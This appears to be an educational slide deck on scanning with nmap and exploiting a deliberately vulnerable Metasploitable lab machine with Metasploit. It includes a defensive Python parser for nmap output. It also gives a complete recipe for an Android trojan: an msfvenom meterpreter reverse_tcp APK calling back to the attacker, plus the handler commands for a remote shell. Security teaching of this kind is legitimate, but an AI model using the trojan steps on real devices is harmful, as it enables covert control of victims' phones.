
Vulnerability scan with NMAP & Intrusion attacks with Metasploit


Montasser Naghmouchi
Plan

* Discovery scans to detect vulnerabilities: nmap.
* Exploiting vulnerabilities with Metasploit:
1. exploiting open ftp ports on machines.
2. creating Trojans for Android.

Reminder : Internet Model (TCP/IP)

Figure 1 : internet model with 4 layers

Reminder : Internet Model (TCP/IP)

Figure 2 : Layers and roles of the internet model

Reminder : TCP connection

Figure 3 : establishing a TCP connection between PC1 and PC2.

Discovery with nmap

* nmap stands for “Network Mapper”; it is an open source network security tool.
* Written in C/C++, nmap has a Scripting Engine (NSE) that extends its network scans.
* nmap uses raw IP packets to scan a network in order to determine the hosts, the services and operating systems used by machines in the network, and the firewall filters in use.

Discovery with nmap

* scan a single host using its IP address or domain name: nmap <IP or domain>
* scan a whole network using an IP address and the network prefix length (CIDR notation): nmap <IP>/<number of bits of the network address>

Discovery with nmap

Figure 4 : one host scan.

Discovery with nmap

Figure 5 : network scan.

Discovery with nmap

Figure 6 : an example showing how nmap can bypass firewall filters.

Discovery with nmap

* Use nmap to scan the victim machine.
* The victim machine is called “Metasploitable” [1]; it is designed for test purposes, contains multiple vulnerabilities and can be attacked.
* Determine the IP address of the machine (there are different methods) and scan it using multiple flags, such as -sV to obtain the versions of the services running on open ports; more options are in the documentation [2].
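
From the defender's side, the same -sV output is also an inventory of exposed services. The following added example (not code from the deck or from nmap) parses a constructed nmap -sV report and flags open cleartext services such as ftp and telnet, plus any open port outside an assumed allowlist; the IP, version strings and allowlist are all placeholders.

```python
"""Parse `nmap -sV` output and flag exposed services (added example; not
from the deck or from nmap). The scan text is constructed with placeholder
versions; the allowlist stands in for a site's own exposure policy."""
import re
# Constructed sample of what `nmap -sV <host>` prints for a lab host.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
Not shown: 995 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          vsftpd 1.2.3
22/tcp   open     ssh          OpenSSH 9.9 (protocol 2.0)
23/tcp   open     telnet       Linux telnetd
80/tcp   open     http         Apache httpd 2.4.0
445/tcp  filtered microsoft-ds
"""
# One port line: "<port>/<proto>  <state>  <service>  [version ...]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Services that send credentials in cleartext (assumed forbidden by policy).
CLEARTEXT = frozenset({"ftp", "telnet"})

def parse_nmap_sv(text):
    """Return one dict per port line; the host comes from the report header."""
    host, records = "?", []
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            host = line.split()[-1]
            continue
        m = PORT_LINE.match(line)
        if m:  # the column header and "Not shown" lines do not match
            port, proto, state, service, version = m.groups()
            records.append({"host": host, "port": int(port), "proto": proto,
                            "state": state, "service": service,
                            "version": version.strip()})
    return records

def flag_exposures(records, allowed=frozenset({22, 80})):
    """Open cleartext services are always findings; other open ports only if not allowed."""
    findings = []
    for r in records:
        if r["state"] != "open":  # filtered/closed ports are not exposures
            continue
        label = f"{r['host']}:{r['port']}/{r['proto']} {r['service']}"
        if r["version"]:
            label += f" [{r['version']}]"
        if r["service"] in CLEARTEXT:
            findings.append("CLEARTEXT " + label)
        elif r["port"] not in allowed:
            findings.append("UNEXPECTED " + label)
    return findings
```

Feeding it a real report (nmap -sV <host> > scan.txt) gives a quick list of services to close, firewall off, or replace with encrypted equivalents before an attacker's scan finds them.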

Metasploit

* A pen-testing framework enabling the discovery and exploitation of weaknesses within systems and machines.
* Contains automated exploitation tools, listeners to establish connections between Metasploit and exploited systems, and command line tools to create payloads (trojans) in multiple formats such as .exe, .apk, etc.
* Metasploit contains a repository of known weaknesses and exploits, accessible using the “search” command in msfconsole.

Metasploit

Figure 7 : an overview of metasploit functionalities

Metasploit + Metasploitable

* Metasploitable is a vulnerable machine created for test purposes, with multiple security problems ready to be exploited in the context of training or teaching.
* We will scan the machine for weaknesses and exploit one of them (the vsftpd service on the open ftp port).
* Use the exploit to:
- see all files on the machine.
- create files / scripts.
- shut down the machine.

Android Trojan with metasploit

* Determine the IP address of your computer running Metasploit (ip addr show).
* Use “msfvenom” to generate the .apk file used to intrude the Android device:
msfvenom -p android/meterpreter/reverse_tcp LHOST=lhost LPORT=lport R> filename.apk
Where: -p is the payload to use, LHOST is your IP to receive the back connection, LPORT is the port where the connection listens (generally 4444 is used) and R is the raw format (apk here).
* The .apk file must be installed on the victim Android device.

Android Trojan with metasploit

* Configure your Metasploit to listen to the devices by running these commands:
1. msfconsole (to open Metasploit)
2. use exploit/multi/handler
3. set payload android/meterpreter/reverse_tcp (the payload used to create the trojan).
4. set lhost <your IP>
5. set lport <the port used: 4444>
6. run (to get a shell and control the device).

External links

[1] https://information.rapid7.com/download-metasploitable-2017.html
[2] https://nmap.org/book/man-host-discovery.html
